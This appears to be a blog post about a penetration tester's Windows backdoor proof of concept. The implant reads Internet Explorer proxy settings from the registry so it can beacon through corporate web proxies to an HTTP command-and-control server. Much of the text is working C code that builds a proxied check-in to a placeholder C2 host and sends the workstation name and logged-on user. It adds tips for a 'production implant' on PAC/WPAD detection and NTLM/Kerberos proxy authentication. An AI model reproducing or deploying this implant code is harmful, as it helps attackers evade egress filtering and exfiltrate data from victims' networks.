Here’s the scenario:
You send a target a backdoor by whatever means you like: a phishing email, a USB stick, whatever. If the network is like most environments today, it does not restrict outbound connections on standard ports such as 80 or 443, so the backdoor calls home on one of those ports and we have a connection inside the candy shell. However, if the target is doing what it should, firewalling off most (or all) outbound TCP ports from user subnets and requiring users to go through a web proxy for outbound requests, the backdoor simply fails.
Solution: Our backdoor needs to detect whether the user's browser is configured to use a proxy server and, if so, call back to our HTTP command and control server through that proxy.
Implementation: I'm not really giving this project a name because in its current state it's just a very simple proof of concept and only reports whether the program was run. We find ourselves doing these lightweight social engineering engagements where we don't necessarily need to penetrate a client further; all we want to know is whether end users are doing things they shouldn't (like clicking malicious links or plugging in unauthorized USB devices). The code is pretty damn ugly, but if I integrate this into my full-blown rootkit/backdoor I'll clean it up. I don't have plans to release my rootkit, but if anyone is interested in checking it out you can email me.
The only things you need to get this POC working are to upload report.php to a web server and change the destination email address in report.php to receive the alerts. Then change the two #defines in main.c (server host and TCP port) to point at this web server. The POC first checks for a proxy by querying the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable. If ProxyEnable is set to 1, it then reads the proxy configuration from ProxyServer under the same key. The POC then reports back to our HTTP server, sending the workstation name and the currently logged-on user in an HTTP GET request; report.php takes these and emails them to us.
If no proxy is detected, the backdoor connects directly to the defined server to issue the GET request, and we receive the email as expected. You can download the source code and report.php file from here.
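As an added example (not the page's POC or its source), here is how the proxy detection and the proxied check-in described above could be written in C. It goes a little beyond the post: the ProxyServer parser accepts both the plain "host:port" value and the per-protocol "http=host:port;https=..." form, the workstation and user fields are percent-encoded before being put in the query string, and the GET is built in the absolute-URI form a proxy expects (the socket then connects to the proxy, not to the C2 host). The C2 host, port and path are assumed placeholders, and the registry read is compiled only on Windows, trying HKCU before HKLM.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Assumed C2 endpoint for this example; the page's main.c uses its own #defines. */
#define C2_HOST "c2.example.com"
#define C2_PORT 8080
#define C2_PATH "/report.php"

/* Parse an Internet Settings\ProxyServer value into host and port. Accepts the
 * plain form "proxy:8080" and the per-protocol form "ftp=gw:21;http=gw:3128;..."
 * (the http= entry is used); a missing port defaults to 80, as IE does.
 * Returns 1 on success, 0 if the value is malformed or has no HTTP proxy. */
int parse_proxy_server(const char *value, char *host, size_t hostlen, int *port)
{
    char buf[256];
    const char *entry = value, *colon; size_t hn;
    if (strchr(value, '=')) {                 /* per-protocol list */
        const char *p = value;
        entry = NULL;
        while (p) {
            size_t n = strcspn(p, ";");       /* length of this entry */
            if (n > 5 && strncmp(p, "http=", 5) == 0 && n - 5 < sizeof buf) {
                memcpy(buf, p + 5, n - 5); buf[n - 5] = '\0'; entry = buf; break;
            }
            p = p[n] ? p + n + 1 : NULL;
        }
        if (!entry) return 0;                 /* e.g. a socks-only value */
    }
    colon = strrchr(entry, ':');
    hn = colon ? (size_t)(colon - entry) : strlen(entry);
    if (hn == 0 || hn >= hostlen) return 0;
    memcpy(host, entry, hn); host[hn] = '\0';
    *port = colon ? atoi(colon + 1) : 80;
    return *port > 0 && *port <= 65535;
}

/* Percent-encode s into out (RFC 3986 unreserved characters pass through) so a
 * DOMAIN\user or an odd hostname cannot break or inject into the query string. */
int url_encode(const char *s, char *out, size_t outlen)
{
    size_t o = 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        int keep = isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~';
        if (o + (keep ? 1 : 3) >= outlen) return 0;
        if (keep) out[o++] = (char)c;
        else o += sprintf(out + o, "%%%02X", c);
    }
    out[o] = '\0';
    return 1;
}

/* Build the check-in GET. Through a proxy the request line must carry the
 * absolute URI and the socket connects to the proxy; directly, the path alone. */
int build_request(int via_proxy, const char *ws, const char *user, char *out, size_t outlen)
{
    char ew[256], eu[256], prefix[256] = "";
    int n;
    if (!url_encode(ws, ew, sizeof ew) || !url_encode(user, eu, sizeof eu)) return 0;
    if (via_proxy) snprintf(prefix, sizeof prefix, "http://%s:%d", C2_HOST, C2_PORT);
    n = snprintf(out, outlen, "GET %s%s?host=%s&user=%s HTTP/1.1\r\n"
                 "Host: %s:%d\r\nConnection: close\r\n\r\n",
                 prefix, C2_PATH, ew, eu, C2_HOST, C2_PORT);
    return n > 0 && (size_t)n < outlen;
}

#ifdef _WIN32
/* Read ProxyEnable/ProxyServer from one hive. Per-user IE settings live under
 * HKCU; the page's POC queries HKLM, so detect_proxy() tries both. */
static int read_proxy_from(HKEY hive, char *host, size_t hostlen, int *port)
{
    HKEY k; DWORD type, enable = 0, esz = sizeof enable;
    char value[512]; DWORD vsz = sizeof value - 1; int ok = 0;
    if (RegOpenKeyExA(hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
                      0, KEY_QUERY_VALUE, &k) != ERROR_SUCCESS)
        return 0;
    if (RegQueryValueExA(k, "ProxyEnable", NULL, &type, (LPBYTE)&enable, &esz) == ERROR_SUCCESS
        && type == REG_DWORD && enable == 1
        && RegQueryValueExA(k, "ProxyServer", NULL, &type, (LPBYTE)value, &vsz) == ERROR_SUCCESS
        && type == REG_SZ) {
        value[vsz] = '\0';                    /* registry strings may lack a terminator */
        ok = parse_proxy_server(value, host, hostlen, port);
    }
    RegCloseKey(k);
    return ok;
}

int detect_proxy(char *host, size_t hostlen, int *port)
{
    return read_proxy_from(HKEY_CURRENT_USER, host, hostlen, port)
        || read_proxy_from(HKEY_LOCAL_MACHINE, host, hostlen, port);
}
#endif
```

Usage: when detect_proxy() returns 1, open the TCP socket to the host and port it filled in and send build_request(1, ...); otherwise connect to C2_HOST:C2_PORT and send build_request(0, ...). An authenticating proxy will answer the unauthenticated request with 407 Proxy Authentication Required, which this example does not handle.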
Limitations: The only real limitation I can think of right now is an organization that isn't using Internet Explorer and stores its proxy settings somewhere else. This is definitely possible, but I doubt a business environment would not also push proxy settings to Internet Explorer, for obvious reasons.
A few other cases are worth checking before relying on this. The per-user copy of these settings lives under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, which is where Internet Options writes them; HKLM holds them only when policy forces machine-wide settings, so a detector should try both hives. A proxy configured through a PAC file or WPAD (AutoConfigURL or auto-detect) leaves ProxyEnable at 0, so a ProxyEnable check alone misses it; WinHttpGetIEProxyConfigForCurrentUser returns the static proxy, the auto-config URL and the auto-detect flag in one call. Finally, a proxy that requires authentication will answer an unauthenticated GET with 407 Proxy Authentication Required, so a production implant has to authenticate to the proxy as the logged-on user (NTLM or Kerberos), which WinHTTP can do for it.